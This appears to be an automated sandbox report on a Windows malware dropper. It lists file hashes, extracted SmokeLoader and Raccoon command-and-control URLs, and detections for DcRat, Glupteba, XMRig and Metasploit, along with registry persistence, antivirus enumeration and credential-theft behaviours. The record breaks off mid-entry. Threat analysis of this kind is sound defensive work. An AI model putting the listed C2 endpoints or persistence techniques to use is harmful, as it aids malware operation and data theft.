Analysis
-
max time kernel
388s -
max time network
1778s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 22:06
Static task
static1
Behavioral task
behavioral1
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
29DEA0BA258723098A514297F4C4D0B7.exe
Resource
win7v20201028
General
-
Target
29DEA0BA258723098A514297F4C4D0B7.exe
-
Size
9.1MB
-
MD5
29dea0ba258723098a514297f4c4d0b7
-
SHA1
7e6320fa26dd41b212ed9fac3cf3c61919af5325
-
SHA256
cf1a8304da78b6286a412d33ef3e0390949eb83e5b08ad63c006ed578d5d4c95
-
SHA512
918dcf85de3ca63869d9771d440d0dfd31447b8433842af8395b987f1cd761b5d5589a7e4fd2e01301c9831db39f105ae8ee9b46b58fa32d3a21ec1d78c28cbd
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/3876-294-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral4/memory/3876-295-0x0000000002620000-0x0000000002F2A000-memory.dmp family_glupteba behavioral4/memory/3876-297-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 6508 created 3104 6508 WerFault.exe RunWW.exe PID 804 created 5228 804 WerFault.exe win1host.exe PID 8492 created 2784 8492 WerFault.exe MicrosoftEdgeCP.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
svchost.exedescription pid process target process PID 4208 created 3876 4208 svchost.exe app.exe PID 4208 created 7380 4208 svchost.exe app.exe PID 4208 created 7184 4208 svchost.exe app.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral4/memory/7648-798-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/7648-808-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/892-843-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/7648-924-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral4/memory/892-955-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 18 IoCs
Processes:
MsiExec.exepowershell.exemsiexec.exemsiexec.execmd.exeflow pid process 198 4492 MsiExec.exe 202 4492 MsiExec.exe 206 4492 MsiExec.exe 208 4492 MsiExec.exe 210 4492 MsiExec.exe 208 4492 MsiExec.exe 208 4492 MsiExec.exe 198 4492 MsiExec.exe 198 4492 MsiExec.exe 202 4492 MsiExec.exe 202 4492 MsiExec.exe 206 4492 MsiExec.exe 210 4492 MsiExec.exe 390 7784 powershell.exe 444 7648 msiexec.exe 469 892 msiexec.exe 493 9716 cmd.exe 494 9716 cmd.exe -
Drops file in Drivers directory 5 IoCs
Processes:
Microsoft.exeC247.exeppppppfy.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe File opened for modification C:\Windows\System32\drivers\SET2C12.tmp C247.exe File created C:\Windows\System32\drivers\SET2C12.tmp C247.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys C247.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe -
Executes dropped EXE 64 IoCs
Processes:
hjjgaa.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exe22.exeguihuali-game.exeHookSetp.exeLabPicV3.tmplylal220.tmpThree.exelilalmix.exeloli.exeMicrosoft.exeppppppfy.exejfiag3g_gg.exemultitimer.exesetups.exesetups.tmpirecord.exejfiag3g_gg.exeirecord.tmpprolab.exeZHikoviralo.exeXateqeryhae.exeJaewowubidae.exeSHadisuxaejo.exeprolab.tmpmultitimer.exemultitimer.exePictures Lab.exelxsajuyiswe.execpyrix.exelxsajuyiswe.tmpufopblr5dc5.exegfs0dd1ffhu.exeapp.exevict.exem4wfftdygki.exeIBInstaller_97039.exevpn.exemd6_6ydj.exemd6_6ydj.exevict.tmpvpn.tmpIBInstaller_97039.tmpaskinstall31.exeaskinstall31.exetoolspab1.exewinlthsth.exewin1host.exetoolspab1.exetoolspab1.exeloli.exeloli.exetoolspab1.exetapinstall.exetapinstall.exe1.exe2.execlient32.exechrome_proxy.exemask_svc.exemask_svc.exepid process 2744 hjjgaa.exe 3104 RunWW.exe 2448 jg7_7wjg.exe 3812 LabPicV3.exe 4068 lylal220.exe 4092 22.exe 204 guihuali-game.exe 4048 HookSetp.exe 1900 LabPicV3.tmp 1264 lylal220.tmp 2412 Three.exe 4000 lilalmix.exe 736 loli.exe 3372 Microsoft.exe 4156 ppppppfy.exe 4264 jfiag3g_gg.exe 4800 multitimer.exe 4916 setups.exe 5064 setups.tmp 4320 irecord.exe 4400 jfiag3g_gg.exe 4388 irecord.tmp 3044 prolab.exe 3232 ZHikoviralo.exe 752 Xateqeryhae.exe 4664 Jaewowubidae.exe 4548 SHadisuxaejo.exe 1016 prolab.tmp 4104 multitimer.exe 2496 multitimer.exe 4272 Pictures Lab.exe 5972 lxsajuyiswe.exe 6028 cpyrix.exe 6108 lxsajuyiswe.tmp 5252 ufopblr5dc5.exe 4168 gfs0dd1ffhu.exe 3876 app.exe 5820 vict.exe 4292 m4wfftdygki.exe 4504 IBInstaller_97039.exe 4360 vpn.exe 4188 md6_6ydj.exe 2232 md6_6ydj.exe 5276 vict.tmp 5304 vpn.tmp 5596 IBInstaller_97039.tmp 4032 askinstall31.exe 5136 askinstall31.exe 6120 toolspab1.exe 5248 winlthsth.exe 5228 win1host.exe 5732 toolspab1.exe 5736 toolspab1.exe 6260 loli.exe 6272 loli.exe 6420 toolspab1.exe 6976 tapinstall.exe 6536 tapinstall.exe 6428 1.exe 5144 2.exe 6932 client32.exe 4240 chrome_proxy.exe 6220 mask_svc.exe 6360 mask_svc.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Processes:
resource yara_rule C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe vmprotect C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe vmprotect -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ZHikoviralo.exeXateqeryhae.execmd.exeWeather.exesetups.tmpsetups.tmpWeather.exeWeather.exesetups.tmpcmd.execmd.exesetups.tmpsetups.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation ZHikoviralo.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Xateqeryhae.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 64 IoCs
Processes:
LabPicV3.tmplylal220.tmprundll32.exerundll32.exesetups.tmplxsajuyiswe.tmpgfs0dd1ffhu.exevict.tmpIBInstaller_97039.tmpvpn.tmptoolspab1.exeloli.exeMsiExec.exeMsiExec.execlient32.exemask_svc.exeRunWW.exeD10E.exeWeather_Installation.exeMaskVPNUpdate.exepid process 1900 LabPicV3.tmp 1264 lylal220.tmp 4280 rundll32.exe 4692 rundll32.exe 5064 setups.tmp 5064 setups.tmp 5064 setups.tmp 5064 setups.tmp 5064 setups.tmp 5064 setups.tmp 5064 setups.tmp 6108 lxsajuyiswe.tmp 4168 gfs0dd1ffhu.exe 5276 vict.tmp 5596 IBInstaller_97039.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5304 vpn.tmp 5736 toolspab1.exe 5304 vpn.tmp 5304 vpn.tmp 6272 loli.exe 6272 loli.exe 4960 MsiExec.exe 4960 MsiExec.exe 4960 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 6932 client32.exe 6932 client32.exe 6932 client32.exe 6932 client32.exe 6932 client32.exe 6932 client32.exe 4492 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 4492 MsiExec.exe 4596 mask_svc.exe 4596 mask_svc.exe 4596 mask_svc.exe 4596 mask_svc.exe 4596 mask_svc.exe 4596 mask_svc.exe 3104 RunWW.exe 3104 RunWW.exe 5304 vpn.tmp 5304 vpn.tmp 6604 D10E.exe 6604 D10E.exe 6604 D10E.exe 6604 D10E.exe 6604 D10E.exe 6952 Weather_Installation.exe 6952 Weather_Installation.exe 6952 Weather_Installation.exe 7220 MaskVPNUpdate.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 16 IoCs
Processes:
aipackagechainer.exeWeather_Installation.exemultitimer.exeConhost.exemultitimer.exeF43F.tmp.exemultitimer.exehjjgaa.exeMicrosoft.exeppppppfy.exemultitimer.exemultitimer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wspbfdtwnpt = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\4FHSS958VD\\multitimer.exe\" 1 3.1617574197.606a39354d1a7" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Conhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fhwwpuheddw = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\GTQ6WGCUR6\\multitimer.exe\" 1 3.1617574042.606a389a4f4e0" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --anbfs" Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" F43F.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\mq2jtj1qjxx = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\T0658PHXVX\\multitimer.exe\" 1 3.1617574269.606a397dcebed" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Wesaezhebaecy.exe\"" Microsoft.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Wesaezhebaecy.exe\"" ppppppfy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\2eoynpwldmy = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\KFSAU8ZEJY\\multitimer.exe\" 1 3.1617574194.606a393260461" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F43F.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4t5ju4ozpgl = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\MXIJ8MLD1I\\multitimer.exe\" 1 3.1617574273.606a398142a26" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 64 IoCs
Processes:
multitimer.exemultitimer.exemultitimer.exemultitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md2_2efs.exewin1host.exejg7_7wjg.exemd6_6ydj.exemd6_6ydj.exemd2_2efs.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA win1host.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md6_6ydj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
gfs0dd1ffhu.exemsiexec.exedescription ioc process File opened (read-only) \??\B: gfs0dd1ffhu.exe File opened (read-only) \??\L: gfs0dd1ffhu.exe File opened (read-only) \??\U: gfs0dd1ffhu.exe File opened (read-only) \??\W: gfs0dd1ffhu.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: gfs0dd1ffhu.exe File opened (read-only) \??\J: gfs0dd1ffhu.exe File opened (read-only) \??\M: gfs0dd1ffhu.exe File opened (read-only) \??\N: gfs0dd1ffhu.exe File opened (read-only) \??\O: gfs0dd1ffhu.exe File opened (read-only) \??\X: gfs0dd1ffhu.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: gfs0dd1ffhu.exe File opened (read-only) \??\K: gfs0dd1ffhu.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: gfs0dd1ffhu.exe File opened (read-only) \??\G: gfs0dd1ffhu.exe File opened (read-only) \??\R: gfs0dd1ffhu.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: gfs0dd1ffhu.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: gfs0dd1ffhu.exe File opened (read-only) \??\Z: gfs0dd1ffhu.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\F: gfs0dd1ffhu.exe File opened (read-only) \??\Q: gfs0dd1ffhu.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: gfs0dd1ffhu.exe File opened (read-only) \??\P: gfs0dd1ffhu.exe File opened (read-only) \??\S: gfs0dd1ffhu.exe File opened (read-only) \??\T: gfs0dd1ffhu.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 447 ipinfo.io 448 ipinfo.io 549 ipinfo.io 561 ipinfo.io 21 ip-api.com 430 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 21 IoCs
Processes:
svchost.exeDrvInst.exesvchost.exetapinstall.exeC247.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\A9WDFGBV.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\SET2A6E.tmp DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 0B9F3E653B73A4E2 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\SET2A6C.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\SET2A6D.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\SET2A6E.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f} DrvInst.exe File created 